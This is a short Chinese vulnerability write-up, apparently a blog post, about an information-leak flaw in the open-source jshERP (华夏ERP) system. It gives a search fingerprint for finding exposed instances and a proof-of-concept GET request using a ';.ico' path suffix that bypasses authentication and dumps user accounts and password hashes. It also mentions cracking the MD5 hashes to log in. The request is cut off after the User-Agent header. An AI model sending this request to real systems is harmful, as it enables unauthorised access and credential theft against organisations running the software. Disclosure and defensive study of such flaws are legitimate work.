漏洞描述
华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。
资产测绘
body=“jshERP-boot”
漏洞影响
开源ERP系统jshERP所有版本

漏洞复现
POC:
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: your_ip
User-Agent

这篇文章揭示了基于SpringBoot的华夏ERPSaaS平台存在的信息泄露漏洞,允许通过特定URL获取用户账号密码。漏洞复现方法和使用MD5解密登录的提示给出,建议对相关接口进行访问限制和安全增强。
1192

被折叠的 条评论
为什么被折叠?



